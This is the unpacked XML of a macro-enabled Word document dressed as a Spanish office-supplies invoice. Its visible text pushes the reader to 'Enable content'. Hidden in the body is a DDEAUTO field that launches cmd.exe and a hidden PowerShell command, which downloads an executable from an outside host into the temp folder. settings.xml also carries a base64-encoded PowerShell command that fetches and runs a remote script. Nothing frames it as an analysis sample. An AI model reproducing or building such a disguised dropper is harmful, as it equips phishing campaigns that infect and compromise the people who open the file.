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Default Extension="png" ContentType="image/png"/>
  <Default Extension="jpeg" ContentType="image/jpeg"/>
  <Default Extension="emf" ContentType="image/x-emf"/>
  <Override PartName="/word/document.xml" ContentType="application/vnd.ms-word.document.macroEnabled.main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settings.xml" ContentType="application/vnd.openxmlformats-officedocument.wordprocessingml.setting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 w:rsidR="00A1B2C3">
      <w:r>
        <w:t xml:space="preserve">Suministros Iberia S.L. — Departamento de Administración</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A1B2C3">
      <w:r>
        <w:t xml:space="preserve">Calle de la Industria 42, 28045 Madrid · CIF B-00000000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A1B2C3">
      <w:r>
        <w:t xml:space="preserve">FACTURA Nº 2026-0187</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A1B2C3">
      <w:r>
        <w:t xml:space="preserve">Cliente: Grupo Ejemplo S.A. — Dpto. Financiero</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A1B2C3">
      <w:r>
        <w:t xml:space="preserve">Concepto: suministro de material de oficina (pedido PO-2026-0412). Importe total: 1.250,00 EUR (IVA incl.).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A1B2C3">
      <w:r>
        <w:t xml:space="preserve">Este documento ha sido protegido. Para ver el contenido, pulse «Habilitar edición» y después «Habilitar contenido».</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A1B2C3">
      <w:r>
        <w:t xml:space="preserve">Si no puede visualizarlo, descárguelo desde https://suministros-iberia.example.com/portal/factura/2026-0187 o contacte con soporte (203.0.113.47).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> DDEAUTO c:\\Windows\\System32\\cmd.exe "/k powershell -w hidden -c iwr http://cdn-update.example.net/files/upd.bin -o %TEMP%\\upd.exe" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:t>Loading…</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:pgSz w:w="11906" w:h="16838"/>
    </w:sectPr>
  </w:body>
</w:document>
</file>

<file path=word/settings.xml><?xml version="1.0" encoding="utf-8"?>
<w:settings xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
  <w:defaultTabStop w:val="708"/>
  <w:docVars>
    <w:docVar w:name="cfg" w:val="SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADgALgA1ADEALgAxADAAMAAuADIAMwAvAGEALgBwAHMAMQAnACkA"/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00A1B2C3"/>
    <w:rsid w:val="00A1B2C3"/>
    <w:rsid w:val="00D4E5F6"/>
    <w:rsid w:val="0047AA19"/>
  </w:rsids>
</w:settings>
</file>

<file path=word/_rels/document.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId11" Type="http://schemas.microsoft.com/office/2006/relationships/vbaProject" Target="vbaProject.bin"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</TotalTime>
  <Pages>1</Pages>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Company>Suministros Iberia S.L.</Compan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Factura 2026-0187</dc:title>
  <dc:subject/>
  <dc:creator>Administracion</dc:creator>
  <cp:keywords/>
  <cp:lastModifiedBy>jmartin</cp:lastModifiedBy>
  <cp:revision>7</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-10-08T07:12:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-10-13T16:48:00Z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partamento">
    <vt:lpwstr>Facturación</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="Referencia">
    <vt:lpwstr>FAC-2026-0187</vt:lpwstr>
  </property>
</Properties>
</file>